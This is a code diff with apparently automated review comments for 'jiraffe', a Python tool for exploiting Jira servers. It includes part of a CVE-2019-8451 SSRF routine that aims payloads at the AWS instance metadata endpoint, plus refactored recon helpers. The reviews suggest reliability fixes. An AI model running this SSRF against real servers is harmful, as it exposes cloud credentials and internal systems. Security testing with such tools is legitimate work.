diff --git a/.gitignore b/.gitignore
index 43214f5..bf6c159 100644
--- a/.gitignore
+++ b/.gitignore
@@ -47,4 +47,5 @@
 Session.vim
 .netrwhist
 *~
-/Jiraffe/*.bak
\ No newline at end of file
+/jiraffe/*.bak
+build-scripts
\ No newline at end of file
diff --git a/README.md b/README.md
index b61efe2..0ad8c7f 100644
--- a/README.md
+++ b/README.md
@@ -12,11 +12,9 @@
-
diff --git a/assets/cov.svg b/assets/cov.svg
new file mode 100644
index 0000000..a9be2c5
--- /dev/null
+++ b/assets/cov.svg
@@ -0,0 +1,21 @@
+
+
diff --git a/jiraffe/__init__.py b/jiraffe/__init__.py
index 3123f1d..380481b 100644
--- a/jiraffe/__init__.py
+++ b/jiraffe/__init__.py
@@ -2,4 +2,4 @@
# -*- coding: utf-8 -*-
name = "jiraffe"
-__version__ = "2.0.5"
\ No newline at end of file
+__version__ = "2.0.6"
\ No newline at end of file
diff --git a/jiraffe/exploits.py b/jiraffe/exploits.py
index 9467101..79d099f 100644
--- a/jiraffe/exploits.py
+++ b/jiraffe/exploits.py
@@ -49,7 +49,7 @@ def cve2019_8451(target, ssrf='https://google.com'):
if '"rc":200' in response and res.status_code == 200 and 'set-cookie' in response:
print(style.GREEN("[+] Target found vulnerable to CVE-2019-8451") + style.RESET(''))
print(style.YELLOW("[*] Detecting target's hosting service ...") + style.RESET(''))
- if isaws(target.split('://')[1]): # dirty but works reliably
+ if isaws(target):
print(style.GREEN("[+] Target is hosted on Amazon AWS") + style.RESET(''))
print(style.YELLOW("[*] Testing AWS SSRF payloads ...") + style.RESET(''))
payload = target + "/plugins/servlet/oauth/users/icon-uri?consumerUri=" + AWS_INSTANCE
diff --git a/jiraffe/recon.py b/jiraffe/recon.py
index c7493a3..697d9d8 100644
--- a/jiraffe/recon.py
+++ b/jiraffe/recon.py
@@ -10,7 +10,16 @@
def uparse(target):
url = urlparse(target)
- return url.scheme + "://" + url.netloc + url.path if url.path else "" # BASE URL
+ if url.path:
+ if url.path == "/":
+ print("[-] Target URL doesn't seems to be correct.\n\t\tValid Target URL Paths: http(s)://target.com/.../(login.action;/view.action;/viewpage.action;/releaseview.action;/aboutconfluencepage.action;/secure/Dashboard.jspa)")
+ return url.scheme + "://" + url.netloc + url.path
+ else:
+ return url.scheme + "://" + url.netloc + url.path
+ return
+ else:
+ print("[-] Target URL doesn't seems to be correct.\n\t\tValid Target URL Paths: http(s)://target.com/.../(login.action;/view.action;/viewpage.action;/releaseview.action;/aboutconfluencepage.action;/secure/Dashboard.jspa)")
+ return url.scheme + "://" + url.netloc
def request(target):
UA = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1"
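Review bot: In `uparse`, the bare `return` after the inner `if`/`else` can never run, and both inner branches return the same expression, so the new body repeats one return three times and the hint text twice. The hint is also only printed: the function still returns a base URL when the path is empty or `/`, so the caller carries on against a target the tool has just called incorrect. If that is intended, a comment should say so; otherwise the caller needs a way to stop. A flatter version with the same output is below, where `BAD_TARGET_HINT` stands for the existing message text defined once. Indentation is not visible on this page, so the nesting is read from the `if`/`else` order.

```python
def uparse(target):
    url = urlparse(target)
    # "" and "/" both mean no page path was supplied; warn once for either.
    if url.path in ("", "/"):
        print(BAD_TARGET_HINT)  # the existing "[-] Target URL doesn't seems ..." text
    # url.path is "" when absent, so one expression covers every case.
    return url.scheme + "://" + url.netloc + url.path
```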
@@ -18,11 +27,11 @@ def request(target):
try:
r = requests.get(target, headers=headers)
except Exception as e:
- print("Problem with the HTTP request.", e, sep="\n")
+ print("[-] Problem with the HTTP request.", e, sep="\n")
if r.status_code != 200:
- print("Something went wrong! (STATUS {})".format(r.status_code))
+ print("[-] Something went wrong! (STATUS {})".format(r.status_code))
if r.status_code == 302:
- print("HTTP request got redirected. Set this instead: " + r.headers['Location'])
+ print("[*] HTTP request got redirected. Set this instead: " + r.headers['Location'])
exit(1) # https://stackoverflow.com/a/2434619
return r, r.text
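Review bot: As far as the flattened hunk shows, the `except` branch in `request` only prints and then falls through to `r.status_code`, where `r` was never assigned, so a connection failure ends in an `UnboundLocalError` instead of stopping at the `[-]` message. Ending that branch with the same `exit(1)` used further down would keep the failure clean. The call `requests.get(target, headers=headers)` also has no `timeout=`, so an unresponsive host blocks the run indefinitely; `requests.get(target, headers=headers, timeout=10)` would bound it (the value 10 is a constructed example). `requests` follows redirects by default, so the `302` branch is unlikely to be reached, and the request silently goes to whatever host the redirect names, unless `allow_redirects=False` is passed. The start of `request` lies outside this hunk.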
@@ -37,7 +46,8 @@ def isjira(target):
return False
def isaws(target):
- data = socket.gethostbyaddr(target)
+ target = urlparse(target)
+ data = socket.gethostbyaddr(target.netloc)
if "amazonaws" in str(data):
return True
else:
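Review bot: `urlparse(target).netloc` in `isaws` still carries any port or `user:pass@` part of the URL, so a target such as `http://host:8080` passes `host:8080` to `socket.gethostbyaddr`, which will not resolve. `.hostname` gives the bare host: `data = socket.gethostbyaddr(urlparse(target).hostname)`. A target given without a scheme parses to an empty `netloc`, and `gethostbyaddr` raises `socket.herror` or `socket.gaierror` when the lookup fails. Neither case is caught here or, as far as the `jiraffe/exploits.py` hunk shows, at the `cve2019_8451` call site. Returning `False` on those errors would match the function's boolean result. The rest of `isaws` lies outside this hunk.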
@@ -48,7 +58,6 @@ def getversion(target): # ENUM #1: Jira version appears to be ____
f_build = '0.0.0' # default
vers = []
final_version = ""
- target = target + urlparse(target).path if "/login.jsp" in urlparse(target).path else target + '/login.jsp'
res, response = request(target)
soup = bs4.BeautifulSoup(response, "html.parser")
try:
diff --git a/setup.py b/setup.py
index 4984541..8f2c931 100644
--- a/setup.py
+++ b/setup.py
@@ -15,7 +15,7 @@
# call to setup()
setup(
name="jiraffe",
- version="2.0.5",
+ version="2.0.6",
description="One stop place for exploiting all Jira instances in your proximity.",
long_description=README,
long_description_content_type="text/markdown",